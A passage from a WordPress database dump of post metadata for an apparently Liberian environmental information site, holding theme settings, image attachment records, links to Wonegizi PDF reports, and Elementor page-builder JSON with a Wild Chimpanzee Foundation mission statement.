}}'),(20913,3055,'_edit_lock','1629376915:42'),(20914,3055,'_edit_last','42'),(20915,3055,'_elementor_controls_usage','a:0:{}'),(20916,3055,'_jetpack_related_posts_cache','a:1:{s:32:\"e10a3b1fd740b2839c10bb96f2e48dff\";a:2:{s:7:\"expires\";i:1628147566;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3704;}i:1;a:1:{s:2:\"id\";i:3178;}i:2;a:1:{s:2:\"id\";i:3181;}}}}'),(20917,3056,'_edit_lock','1629364199:42'),(20918,3056,'_edit_last','42'),(20919,3056,'_elementor_controls_usage','a:0:{}'),(20920,3056,'_jetpack_related_posts_cache','a:1:{s:32:\"e10a3b1fd740b2839c10bb96f2e48dff\";a:2:{s:7:\"expires\";i:1627499235;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3058;}i:1;a:1:{s:2:\"id\";i:3055;}i:2;a:1:{s:2:\"id\";i:3704;}}}}'),(20921,3058,'_edit_lock','1629364214:42'),(20922,3058,'_edit_last','42'),(20923,3058,'_elementor_controls_usage','a:0:{}'),(20924,478,'_jetpack_related_posts_cache','a:1:{s:32:\"089eac97c449e1cc8677319ff6720a8f\";a:2:{s:7:\"expires\";i:1627864191;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:472;}i:1;a:1:{s:2:\"id\";i:476;}i:2;a:1:{s:2:\"id\";i:477;}}}}'),(20925,3058,'_jetpack_related_posts_cache','a:1:{s:32:\"e10a3b1fd740b2839c10bb96f2e48dff\";a:2:{s:7:\"expires\";i:1628704615;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3789;}i:1;a:1:{s:2:\"id\";i:3704;}i:2;a:1:{s:2:\"id\";i:3056;}}}}'),(20926,3060,'_elementor_controls_usage','a:0:{}'),(20927,3060,'_thumbnail_id','3061'),(20928,3060,'ocean_gallery_link_images','off'),(20929,3060,'ocean_sidebar','0'),(20930,3060,'ocean_second_sidebar','0'),(20931,3060,'ocean_disable_margins','enable'),(20932,3060,'ocean_display_top_bar','default'),(20933,3060,'ocean_display_header','default'),(20934,3060,'ocean_center_header_left_menu','0'),(20935,3060,'ocean_custom_header_template','0'),(20936,3060,'ocean_header_custom_menu','0'),(20937,3060,'ocean_menu_typo_font_family','0'),(20938,3060,'ocean_disable_title','default'),(20939,3060,'ocean_disable_heading','default'),(20940,3060,'ocean_disable_breadcrumbs','default'),(20941,3060,'ocean_display_footer_widgets','default'),(20942,3060,'ocean_display_footer_bottom','default'),(20943,3060,'ocean_custom_footer_template','0'),(20944,3060,'ocean_link_format_target','self'),(20945,3060,'ocean_quote_format_link','post'),(20946,3060,'osh_disable_topbar_sticky','default'),(20947,3060,'osh_disable_header_sticky','default'),(20948,3060,'osh_sticky_header_style','default'),(20949,3060,'_dp_original','3045'),(20950,3060,'_jetpack_related_posts_cache','a:2:{s:32:\"37550b67d263a3ce789993dc25046c5f\";a:2:{s:7:\"expires\";i:1629103665;s:7:\"payload\";a:6:{i:0;a:1:{s:2:\"id\";i:3069;}i:1;a:1:{s:2:\"id\";i:3297;}i:2;a:1:{s:2:\"id\";i:3721;}i:3;a:1:{s:2:\"id\";i:2956;}i:4;a:1:{s:2:\"id\";i:3307;}i:5;a:1:{s:2:\"id\";i:2801;}}}s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1629107284;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3069;}i:1;a:1:{s:2:\"id\";i:3297;}i:2;a:1:{s:2:\"id\";i:3721;}}}}'),(20951,3060,'_edit_lock','1598614112:42'),(20952,3046,'_edit_lock','1591195690:38'),(20953,3061,'_wp_attached_file','2020/06/epa-waste.jpg'),(20954,3061,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:720;s:4:\"file\";s:21:\"2020/06/epa-waste.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"epa-waste-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"epa-waste-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"epa-waste-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(20957,3060,'_edit_last','42'),(20962,3063,'_elementor_controls_usage','a:0:{}'),(20963,3063,'_thumbnail_id','3064'),(20964,3063,'ocean_gallery_link_images','off'),(20965,3063,'ocean_sidebar','0'),(20966,3063,'ocean_second_sidebar','0'),(20967,3063,'ocean_disable_margins','enable'),(20968,3063,'ocean_display_top_bar','default'),(20969,3063,'ocean_display_header','default'),(20970,3063,'ocean_center_header_left_menu','0'),(20971,3063,'ocean_custom_header_template','0'),(20972,3063,'ocean_header_custom_menu','0'),(20973,3063,'ocean_menu_typo_font_family','0'),(20974,3063,'ocean_disable_title','default'),(20975,3063,'ocean_disable_heading','default'),(20976,3063,'ocean_disable_breadcrumbs','default'),(20977,3063,'ocean_display_footer_widgets','default'),(20978,3063,'ocean_display_footer_bottom','default'),(20979,3063,'ocean_custom_footer_template','0'),(20980,3063,'ocean_link_format_target','self'),(20981,3063,'ocean_quote_format_link','post'),(20982,3063,'osh_disable_topbar_sticky','default'),(20983,3063,'osh_disable_header_sticky','default'),(20984,3063,'osh_sticky_header_style','default'),(20986,3063,'_dp_original','3060'),(20987,3063,'_jetpack_related_posts_cache','a:1:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1628240854;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:2801;}i:1;a:1:{s:2:\"id\";i:3721;}i:2;a:1:{s:2:\"id\";i:3316;}}}}'),(20988,3063,'_edit_lock','1598614059:42'),(20989,3064,'_wp_attached_file','2020/06/DED.jpg'),(20990,3064,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:806;s:4:\"file\";s:15:\"2020/06/DED.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"DED-300x252.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:252;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"DED-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"DED-768x645.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:645;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(20993,3063,'_edit_last','42'),(20994,479,'_jetpack_related_posts_cache','a:1:{s:32:\"089eac97c449e1cc8677319ff6720a8f\";a:2:{s:7:\"expires\";i:1628415040;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:476;}i:1;a:1:{s:2:\"id\";i:473;}i:2;a:1:{s:2:\"id\";i:467;}}}}'),(20995,3066,'_elementor_controls_usage','a:0:{}'),(20996,3066,'_thumbnail_id','3067'),(20997,3066,'ocean_gallery_link_images','off'),(20998,3066,'ocean_sidebar','0'),(20999,3066,'ocean_second_sidebar','0'),(21000,3066,'ocean_disable_margins','enable'),(21001,3066,'ocean_display_top_bar','default'),(21002,3066,'ocean_display_header','default'),(21003,3066,'ocean_center_header_left_menu','0'),(21004,3066,'ocean_custom_header_template','0'),(21005,3066,'ocean_header_custom_menu','0'),(21006,3066,'ocean_menu_typo_font_family','0'),(21007,3066,'ocean_disable_title','default'),(21008,3066,'ocean_disable_heading','default'),(21009,3066,'ocean_disable_breadcrumbs','default'),(21010,3066,'ocean_display_footer_widgets','default'),(21011,3066,'ocean_display_footer_bottom','default'),(21012,3066,'ocean_custom_footer_template','0'),(21013,3066,'ocean_link_format_target','self'),(21014,3066,'ocean_quote_format_link','post'),(21015,3066,'osh_disable_topbar_sticky','default'),(21016,3066,'osh_disable_header_sticky','default'),(21017,3066,'osh_sticky_header_style','default'),(21019,3066,'_dp_original','3063'),(21020,3066,'_jetpack_related_posts_cache','a:1:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1629024116;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3069;}i:1;a:1:{s:2:\"id\";i:3027;}i:2;a:1:{s:2:\"id\";i:3060;}}}}'),(21021,3066,'_edit_lock','1598614031:42'),(21022,3067,'_wp_attached_file','2020/06/DED-PIC.jpg'),(21023,3067,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:816;s:6:\"height\";i:612;s:4:\"file\";s:19:\"2020/06/DED-PIC.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"DED-PIC-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"DED-PIC-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"DED-PIC-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(21026,3066,'_edit_last','42'),(21027,3069,'_jetpack_related_posts_cache','a:2:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1629096697;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3066;}i:1;a:1:{s:2:\"id\";i:3027;}i:2;a:1:{s:2:\"id\";i:3023;}}}s:32:\"37550b67d263a3ce789993dc25046c5f\";a:2:{s:7:\"expires\";i:1629103665;s:7:\"payload\";a:6:{i:0;a:1:{s:2:\"id\";i:3066;}i:1;a:1:{s:2:\"id\";i:3027;}i:2;a:1:{s:2:\"id\";i:3023;}i:3;a:1:{s:2:\"id\";i:3752;}i:4;a:1:{s:2:\"id\";i:3060;}i:5;a:1:{s:2:\"id\";i:3090;}}}}'),(21028,3069,'_edit_lock','1598614003:42'),(21029,3070,'_wp_attached_file','2020/06/fines.jpg'),(21030,3070,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:17:\"2020/06/fines.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"fines-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"fines-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:17:\"fines-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(21031,3069,'_elementor_controls_usage','a:0:{}'),(21036,3069,'_thumbnail_id','3070'),(21037,3069,'_edit_last','42'),(21038,3069,'ocean_gallery_link_images','off'),(21039,3069,'ocean_sidebar','0'),(21040,3069,'ocean_second_sidebar','0'),(21041,3069,'ocean_disable_margins','enable'),(21042,3069,'ocean_display_top_bar','default'),(21043,3069,'ocean_display_header','default'),(21044,3069,'ocean_center_header_left_menu','0'),(21045,3069,'ocean_custom_header_template','0'),(21046,3069,'ocean_header_custom_menu','0'),(21047,3069,'ocean_menu_typo_font_family','0'),(21048,3069,'ocean_disable_title','default'),(21049,3069,'ocean_disable_heading','default'),(21050,3069,'ocean_disable_breadcrumbs','default'),(21051,3069,'ocean_display_footer_widgets','default'),(21052,3069,'ocean_display_footer_bottom','default'),(21053,3069,'ocean_custom_footer_template','0'),(21054,3069,'ocean_link_format_target','self'),(21055,3069,'ocean_quote_format_link','post'),(21056,3069,'osh_disable_topbar_sticky','default'),(21057,3069,'osh_disable_header_sticky','default'),(21058,3069,'osh_sticky_header_style','default'),(21059,3072,'_jetpack_related_posts_cache','a:1:{s:32:\"37550b67d263a3ce789993dc25046c5f\";a:2:{s:7:\"expires\";i:1628336891;s:7:\"payload\";a:6:{i:0;a:1:{s:2:\"id\";i:2956;}i:1;a:1:{s:2:\"id\";i:3781;}i:2;a:1:{s:2:\"id\";i:3038;}i:3;a:1:{s:2:\"id\";i:3045;}i:4;a:1:{s:2:\"id\";i:3027;}i:5;a:1:{s:2:\"id\";i:3764;}}}}'),(21060,3072,'_edit_lock','1598613529:42'),(21061,3073,'_wp_attached_file','2020/06/oil-company.jpg'),(21062,3073,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:850;s:6:\"height\";i:283;s:4:\"file\";s:23:\"2020/06/oil-company.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"oil-company-300x100.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"oil-company-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"oil-company-768x256.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:256;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(21063,3072,'_elementor_controls_usage','a:0:{}'),(21066,3072,'_thumbnail_id','3073'),(21067,3072,'_edit_last','42'),(21068,3072,'ocean_gallery_link_images','off'),(21069,3072,'ocean_sidebar','0'),(21070,3072,'ocean_second_sidebar','0'),(21071,3072,'ocean_disable_margins','enable'),(21072,3072,'ocean_display_top_bar','default'),(21073,3072,'ocean_display_header','default'),(21074,3072,'ocean_center_header_left_menu','0'),(21075,3072,'ocean_custom_header_template','0'),(21076,3072,'ocean_header_custom_menu','0'),(21077,3072,'ocean_menu_typo_font_family','0'),(21078,3072,'ocean_disable_title','default'),(21079,3072,'ocean_disable_heading','default'),(21080,3072,'ocean_disable_breadcrumbs','default'),(21081,3072,'ocean_display_footer_widgets','default'),(21082,3072,'ocean_display_footer_bottom','default'),(21083,3072,'ocean_custom_footer_template','0'),(21084,3072,'ocean_link_format_target','self'),(21085,3072,'ocean_quote_format_link','post'),(21086,3072,'osh_disable_topbar_sticky','default'),(21087,3072,'osh_disable_header_sticky','default'),(21088,3072,'osh_sticky_header_style','default'),(21100,3077,'_wp_attached_file','2020/06/HCV-1-4-Report-Wonegizi.pdf'),(21108,3078,'_wp_attached_file','2020/06/HCV-1-4-Report-Wonegizi-1.pdf'),(21119,3079,'_elementor_controls_usage','a:0:{}'),(21120,3079,'by','FFI'),(21121,3079,'year','2018'),(21122,3079,'download_link','https://ekmsliberia.info/wp-content/uploads/2020/06/HCV-1-4-Report-Wonegizi.pdf'),(21123,3079,'_pods_cover_image','a:1:{i:0;i:573;}'),(21124,3079,'_pods_file_type_image','a:1:{i:0;i:1686;}'),(21129,3079,'_dp_original','2751'),(21130,3079,'_edit_lock','1670325107:42'),(21131,3079,'_edit_last','42'),(21132,3080,'_wp_attached_file','2020/06/HCV-1-4-Report-Wonegizi-2.pdf'),(21134,3079,'_pods_attached_document','a:1:{i:0;i:3080;}'),(21147,3079,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1628924678;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:2609;}i:1;a:1:{s:2:\"id\";i:3251;}i:2;a:1:{s:2:\"id\";i:3226;}}}}'),(21150,3082,'_wp_attached_file','2020/06/NORADLargeMammalSurveyWonegizi.pdf'),(21155,3083,'_vc_post_settings','s:30:\"a:1:{s:10:\"vc_grid_id\";a:0:{}}\";'),(21156,3083,'_vc_post_settings','s:30:\"a:1:{s:10:\"vc_grid_id\";a:0:{}}\";'),(21157,3083,'slide_template','default'),(21158,3083,'slide_template','default'),(21161,3083,'_elementor_template_type','wp-post'),(21162,3083,'_elementor_template_type','wp-post'),(21163,3083,'_elementor_version','2.8.1'),(21164,3083,'_elementor_version','2.8.1'),(21165,3083,'_wp_page_template','default'),(21166,3083,'_wp_page_template','default'),(21167,3083,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a3e5fad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Wild Chimpanzee Foundation\\u2019s mission is to enhance the survival of the remaining wild chimpanzee populations and their habitat, thereby participate in saving the behavioural diversity of this fascinating species. The philosophy of the WCF is threefold: Implement projects of Education, Conservation, and Research for and by the African people<\\/p><p>WCF implements conservation projects in C\\u00f4te d\\u2019Ivoire, Liberia and Guinea. We concentrate our activities in regions were wild chimpanzees are still abundant to ensure their future survival<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9a4752\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"602e7b89\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5a027f71\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f156dc7\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"ffi\\\",\\\"tag_id\\\":\\\"54\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"ffi\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"58a3e8b9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"615c3465\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"6bc66929\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"581f0bca\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:ffi\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(21168,3083,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a3e5fad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Wild Chimpanzee Foundation\\u2019s mission is to enhance the survival of the remaining wild chimpanzee populations and their habitat, thereby participate in saving the behavioural diversity of this fascinating species. The philosophy of the WCF is threefold: Implement projects of Education, Conservation, and Research for and by the African people<\\/p><p>WCF implements conservation projects in C\\u00f4te d\\u2019Ivoire, Liberia and Guinea. We concentrate our activities in regions were wild chimpanzees are still abundant to ensure their future survival<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9a4752\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"602e7b89\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5a027f71\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f156dc7\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read 